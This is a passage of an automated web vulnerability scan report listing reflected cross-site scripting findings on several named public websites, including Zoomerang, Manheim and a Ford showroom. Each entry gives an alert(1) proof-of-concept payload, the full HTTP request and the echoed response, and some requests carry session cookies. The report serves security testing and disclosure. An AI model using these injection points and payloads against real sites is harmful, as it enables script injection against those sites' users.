Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:52:37 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 99623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <t
...[SNIP]...
Type="";
s_265.linkInternalFilters="javascript:,walletpop.com";
s_265.mmxgo = true;
s_265.prop1="WalletPop";
s_265.prop2="Category";
s_265.prop12="http://www.walletpop.com/blog/category/consumer-ally/?561c9"-alert(1)-"71480e1a622=1";
s_265.prop16="Consumer Ally - Consumer Information, Help, Recall News, As Seen on TV Reviews -- WalletPop";
s_265.prop17="";
s_265.prop18="consumer-ally";
s_265.prop19="";
s_265.prop20="";
s_265.p
...[SNIP]...

2.805. http://www.walletpop.com/blog/category/consumer-ally/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /blog/category/consumer-ally/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3573"><script>alert(1)</script>db116a1f1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/category/consumer-ally/?d3573"><script>alert(1)</script>db116a1f1a=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:52:34 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 99692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <t
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/blog/category/consumer-ally/?d3573"><script>alert(1)</script>db116a1f1a=1"/>
...[SNIP]...

2.806. http://www.wltx.com/news/story.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wltx.com
Path:   /news/story.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8950d"><script>alert(1)</script>a661404d210 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/story.aspx?storyid=93029&8950d"><script>alert(1)</script>a661404d210=1 HTTP/1.1
Host: www.wltx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Cache-Control: private, max-age=480
Date: Fri, 19 Nov 2010 23:52:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<a href="mailto:klrice@wltx.gannett.com?subject=viewer question about an article&body=Link:http://www.wltx.com/news/story.aspx?storyid=93029&8950d"><script>alert(1)</script>a661404d210=1">
...[SNIP]...

2.807. http://www.zoomerang.com/Survey/Poll/WEB22BDWQ9U9RV [bgc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zoomerang.com
Path:   /Survey/Poll/WEB22BDWQ9U9RV

Issue detail

The value of the bgc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14a47"style%3d"x%3aexpression(alert(1))"e7fb7af41fa was submitted in the bgc parameter. This input was echoed as 14a47"style="x:expression(alert(1))"e7fb7af41fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Survey/Poll/WEB22BDWQ9U9RV?width=268&bc=6699FF&bgc=FFFFFF14a47"style%3d"x%3aexpression(alert(1))"e7fb7af41fa&fc=000000&fs=11&rc=False&rp=False&trc=True&shn=True&tb=False&pr=False&mode=htmldoc HTTP/1.1
Host: www.zoomerang.com
Proxy-Connection: keep-alive
Referer: http://www.thinkfinity.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 03:04:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6734
Set-Cookie: BIGipServerWDC-PROD-ZM-WWW-SURVEY_80-8086=1041004554.38431.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <!--[if lte IE 6]>
...[SNIP]...
<div style="margin:0;background-color:#FFFFFF14a47"style="x:expression(alert(1))"e7fb7af41fa;border:1px solid #D4D4D4;font-family:Arial, Verdana;color:#000000;width:268px;background-image:url(http://www.zoomerang.com/Survey/App_Themes/SurveyTheme/Images/Poll/transparent_overlay.png);backgroun
...[SNIP]...

2.808. http://www.zoomerang.com/Survey/Poll/WEB22BDWQ9U9RV [fc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zoomerang.com
Path:   /Survey/Poll/WEB22BDWQ9U9RV

Issue detail

The value of the fc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e62"style%3d"x%3aexpression(alert(1))"de2c07e0a62 was submitted in the fc parameter. This input was echoed as f0e62"style="x:expression(alert(1))"de2c07e0a62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Survey/Poll/WEB22BDWQ9U9RV?width=268&bc=6699FF&bgc=FFFFFF&fc=000000f0e62"style%3d"x%3aexpression(alert(1))"de2c07e0a62&fs=11&rc=False&rp=False&trc=True&shn=True&tb=False&pr=False&mode=htmldoc HTTP/1.1
Host: www.zoomerang.com
Proxy-Connection: keep-alive
Referer: http://www.thinkfinity.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 03:05:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6838
Set-Cookie: BIGipServerWDC-PROD-ZM-WWW-SURVEY_80-8086=1041004554.38431.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <!--[if lte IE 6]>
...[SNIP]...
<div style="margin:0;background-color:#FFFFFF;border:1px solid #D4D4D4;font-family:Arial, Verdana;color:#000000f0e62"style="x:expression(alert(1))"de2c07e0a62;width:268px;background-image:url(http://www.zoomerang.com/Survey/App_Themes/SurveyTheme/Images/Poll/transparent_overlay_for_white.png);background-repeat: no-repeat;">
...[SNIP]...

2.809. http://www.zoomerang.com/Survey/Poll/WEB22BDWQ9U9RV [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zoomerang.com
Path:   /Survey/Poll/WEB22BDWQ9U9RV

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf454"style%3d"x%3aexpression(alert(1))"5ebd6863c24 was submitted in the width parameter. This input was echoed as bf454"style="x:expression(alert(1))"5ebd6863c24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Survey/Poll/WEB22BDWQ9U9RV?width=268bf454"style%3d"x%3aexpression(alert(1))"5ebd6863c24&bc=6699FF&bgc=FFFFFF&fc=000000&fs=11&rc=False&rp=False&trc=True&shn=True&tb=False&pr=False&mode=htmldoc HTTP/1.1
Host: www.zoomerang.com
Proxy-Connection: keep-alive
Referer: http://www.thinkfinity.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 03:04:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6750
Set-Cookie: BIGipServerWDC-PROD-ZM-WWW-SURVEY_80-8086=1041004554.38431.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <!--[if lte IE 6]>
...[SNIP]...
<div style="margin:0;background-color:#FFFFFF;border:1px solid #D4D4D4;font-family:Arial, Verdana;color:#000000;width:268bf454"style="x:expression(alert(1))"5ebd6863c24px;background-image:url(http://www.zoomerang.com/Survey/App_Themes/SurveyTheme/Images/Poll/transparent_overlay_small_for_white.png);background-repeat: no-repeat;">
...[SNIP]...

2.810. http://www2.manheim.com/signup/step_one [language_selected parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.manheim.com
Path:   /signup/step_one

Issue detail

The value of the language_selected request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d6d3'%3balert(1)//548507961d was submitted in the language_selected parameter. This input was echoed as 4d6d3';alert(1)//548507961d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /signup/step_one?WT.svl=m_home_signup&language_selected=en4d6d3'%3balert(1)//548507961d HTTP/1.1
Host: www2.manheim.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=174.122.23.218-863889568.30115917:lv=1290217859894:ss=1290217841584; basic_auth=; _manheim_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--95fa4ee4f9cc21c76c9037264e537021a1a154bb; lang=en; password=; basic_auth_checked=;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_auth_tkt/2.0.0rc3 Phusion_Passenger/2.2.2
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.2
X-Runtime: 0.00663
ETag: "bff4c6e79cefdafa47b9200a22b35e35"
Content-Language: en
Cache-Control: private, max-age=0, must-revalidate
Status: 200 OK
Content-Type: text/html; charset=utf-8
Date: Sat, 20 Nov 2010 03:05:57 GMT
Content-Length: 25839
Connection: close
Set-Cookie: lang=en; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Manheim - Sign Up

...[SNIP]...
<script type='text/javascript'>
Event.observe(window, 'load', function() {
Language.showLang('en4d6d3';alert(1)//548507961d');
});
</script>
...[SNIP]...

2.811. https://www2.manheim.com/login/forgot_password [language_selected parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www2.manheim.com
Path:   /login/forgot_password

Issue detail

The value of the language_selected request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efece'%3balert(1)//b9ba96d0ede was submitted in the language_selected parameter. This input was echoed as efece';alert(1)//b9ba96d0ede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/forgot_password?WT.svl=m_login_help_pw&language_selected=enefece'%3balert(1)//b9ba96d0ede HTTP/1.1
Host: www2.manheim.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=174.122.23.218-863889568.30115917:lv=1290217859894:ss=1290217841584; basic_auth=; _manheim_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--95fa4ee4f9cc21c76c9037264e537021a1a154bb; lang=en; password=; basic_auth_checked=;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_auth_tkt/2.0.0rc3 Phusion_Passenger/2.2.2
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.2
X-Runtime: 0.01333
ETag: "bf76fa70f6cb427e073625acb8dd3516"
Content-Language: en
Cache-Control: private, max-age=0, must-revalidate
Status: 200 OK
Content-Type: text/html; charset=utf-8
Date: Sat, 20 Nov 2010 03:06:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lang=en; path=/
Content-Length: 41635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Manheim - Forgot y
...[SNIP]...
<script type='text/javascript'>
Event.observe(window, 'load', function() {
Language.showLang('enefece';alert(1)//b9ba96d0ede');
});
</script>
...[SNIP]...

2.812. https://www2.manheim.com/login/forgot_username [language_selected parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www2.manheim.com
Path:   /login/forgot_username

Issue detail

The value of the language_selected request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53198'%3balert(1)//84c06fba3ee was submitted in the language_selected parameter. This input was echoed as 53198';alert(1)//84c06fba3ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/forgot_username?WT.svl=m_login_help_un&language_selected=en53198'%3balert(1)//84c06fba3ee HTTP/1.1
Host: www2.manheim.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=174.122.23.218-863889568.30115917:lv=1290217859894:ss=1290217841584; basic_auth=; _manheim_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--95fa4ee4f9cc21c76c9037264e537021a1a154bb; lang=en; password=; basic_auth_checked=;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_auth_tkt/2.0.0rc3 Phusion_Passenger/2.2.2
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.2
X-Runtime: 0.01372
ETag: "f8d9dc2ae3c26268c0862aebfb4a26ab"
Content-Language: en
Cache-Control: private, max-age=0, must-revalidate
Status: 200 OK
Content-Type: text/html; charset=utf-8
Date: Sat, 20 Nov 2010 03:06:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lang=en; path=/
Content-Length: 38646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Manheim - Forgot y
...[SNIP]...
<script type='text/javascript'>
Event.observe(window, 'load', function() {
Language.showLang('en53198';alert(1)//84c06fba3ee');
});
</script>
...[SNIP]...

2.813. https://www2.manheim.com/signup/step_one [language_selected parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www2.manheim.com
Path:   /signup/step_one

Issue detail

The value of the language_selected request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56617'%3balert(1)//18cd940d8d2 was submitted in the language_selected parameter. This input was echoed as 56617';alert(1)//18cd940d8d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /signup/step_one?WT.svl=m_login_help_signup&language_selected=en56617'%3balert(1)//18cd940d8d2 HTTP/1.1
Host: www2.manheim.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=174.122.23.218-863889568.30115917:lv=1290217859894:ss=1290217841584; basic_auth=; _manheim_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--95fa4ee4f9cc21c76c9037264e537021a1a154bb; lang=en; password=; basic_auth_checked=;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_auth_tkt/2.0.0rc3 Phusion_Passenger/2.2.2
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.2
X-Runtime: 0.00713
ETag: "fb3e798612136bdeb1cf5067e5e29147"
Content-Language: en
Cache-Control: private, max-age=0, must-revalidate
Status: 200 OK
Content-Type: text/html; charset=utf-8
Date: Sat, 20 Nov 2010 03:06:53 GMT
Content-Length: 25840
Connection: close
Set-Cookie: lang=en; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Manheim - Sign Up

...[SNIP]...
<script type='text/javascript'>
Event.observe(window, 'load', function() {
Language.showLang('en56617';alert(1)//18cd940d8d2');
});
</script>
...[SNIP]...

2.814. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.showroom.fordvehicles.com
Path:   /FDShowroom.jsp

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1553c'%3balert(1)//c939bb738d9 was submitted in the branding parameter. This input was echoed as 1553c';alert(1)//c939bb738d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FDShowroom.jsp?branding=11553c'%3balert(1)//c939bb738d9&referringSite=1&lang=en&makeTransition=inventory HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.fordvehicles.com/search/?f%3AsearchInputString=%60&f%3Asearch=+&formID=globalSearchForm
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www2.showroom.fordvehicles.com
Proxy-Connection: Keep-Alive
Cookie: userInfo=country_code=US,region_code=TX,city=DALLAS,county=DALLAS,zip=75201-75212+75214-75254+75258+75260-75267+75270+75275+75277+75283-75287+75294-75295+75301+75303+75310+75312-75313+75315+75320+75323+75326+75336+75339+75342+75346+75353-75357+75359-75360+75363-75364+75367-75368+75370-75374+75376+75378-75382+75386-75398; N1Z4=3eWtBBPhsCR-4jzP2Z0GuHBwTJ8cthcMPgKQF-EbpTxzGQmYEntRODg; FPI=model=Mustang&make=Ford&year=2011&html=false; sessionActive=true; s_cc=true; s_p_s_prop8=natural-referrer; ev_36_getval=20101119%2018; visivalm=0; visivale=0; lastcheck=1; s_sq=fmcfvngprod%2Cfmcglobal%3D%2526pid%253Dfv%25253Asite%252520search%252520results%25253Apage%2525201%2526pidt%253D1%2526oid%253Dhttp%25253A//www2.showroom.fordvehicles.com/FDShowroom.jsp%25253Fbranding%25253D1%252526referringSite%25253D1%252526lang%25253Den%252526makeTransiti%2526ot%253DA%2526oi%253D1589; ev22_getval=%60

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 03:07:11 GMT
Connection: close
Content-Length: 115339

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Ford Vehicle Showroom</title>


<script type="text/javascript">
//<![CDATA[
...[SNIP]...
d = false;

var clubWTKWidgets = true;
var urlParamMap = {
'document_referrer':document.referrer,'makeTransition':unescape('inventory'),'Skin':'Mustang','FVS':false,'referringSite':'1'
,'branding':'11553c';alert(1)//c939bb738d9'
,'makeTransition':'inventory'
,'lang':'en'
};

if(typeof urlParamMap.httpReferer != "undefined"){
urlParamMap.httpReferer = escape(urlParamMap.httpReferer);
}
if(typeof urlParamMap.referrerURL !=
...[SNIP]...

2.815. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.showroom.fordvehicles.com
Path:   /FDShowroom.jsp

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65601'%3balert(1)//232fb5331a8 was submitted in the lang parameter. This input was echoed as 65601';alert(1)//232fb5331a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FDShowroom.jsp?branding=1&referringSite=1&lang=en65601'%3balert(1)//232fb5331a8&makeTransition=inventory HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.fordvehicles.com/search/?f%3AsearchInputString=%60&f%3Asearch=+&formID=globalSearchForm
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www2.showroom.fordvehicles.com
Proxy-Connection: Keep-Alive
Cookie: userInfo=country_code=US,region_code=TX,city=DALLAS,county=DALLAS,zip=75201-75212+75214-75254+75258+75260-75267+75270+75275+75277+75283-75287+75294-75295+75301+75303+75310+75312-75313+75315+75320+75323+75326+75336+75339+75342+75346+75353-75357+75359-75360+75363-75364+75367-75368+75370-75374+75376+75378-75382+75386-75398; N1Z4=3eWtBBPhsCR-4jzP2Z0GuHBwTJ8cthcMPgKQF-EbpTxzGQmYEntRODg; FPI=model=Mustang&make=Ford&year=2011&html=false; sessionActive=true; s_cc=true; s_p_s_prop8=natural-referrer; ev_36_getval=20101119%2018; visivalm=0; visivale=0; lastcheck=1; s_sq=fmcfvngprod%2Cfmcglobal%3D%2526pid%253Dfv%25253Asite%252520search%252520results%25253Apage%2525201%2526pidt%253D1%2526oid%253Dhttp%25253A//www2.showroom.fordvehicles.com/FDShowroom.jsp%25253Fbranding%25253D1%252526referringSite%25253D1%252526lang%25253Den%252526makeTransiti%2526ot%253DA%2526oi%253D1589; ev22_getval=%60

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 03:07:11 GMT
Connection: close
Content-Length: 115339

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Ford Vehicle Showroom</title>


<script type="text/javascript">
//<![CDATA[
...[SNIP]...
r urlParamMap = {
'document_referrer':document.referrer,'makeTransition':unescape('inventory'),'Skin':'Mustang','FVS':false,'referringSite':'1'
,'branding':'1'
,'makeTransition':'inventory'
,'lang':'en65601';alert(1)//232fb5331a8'
};

if(typeof urlParamMap.httpReferer != "undefined"){
urlParamMap.httpReferer = escape(urlParamMap.httpReferer);
}
if(typeof urlParamMap.referrerURL != "undefined"){
urlParamMap.referrerURL = e
...[SNIP]...

2.816. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [makeTransition parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.showroom.fordvehicles.com
Path:   /FDShowroom.jsp

Issue detail

The value of the makeTransition request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67b93'%3balert(1)//711fbffab0c was submitted in the makeTransition parameter. This input was echoed as 67b93';alert(1)//711fbffab0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FDShowroom.jsp?branding=1&referringSite=1&lang=en&makeTransition=inventory67b93'%3balert(1)//711fbffab0c HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.fordvehicles.com/search/?f%3AsearchInputString=%60&f%3Asearch=+&formID=globalSearchForm
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www2.showroom.fordvehicles.com
Proxy-Connection: Keep-Alive
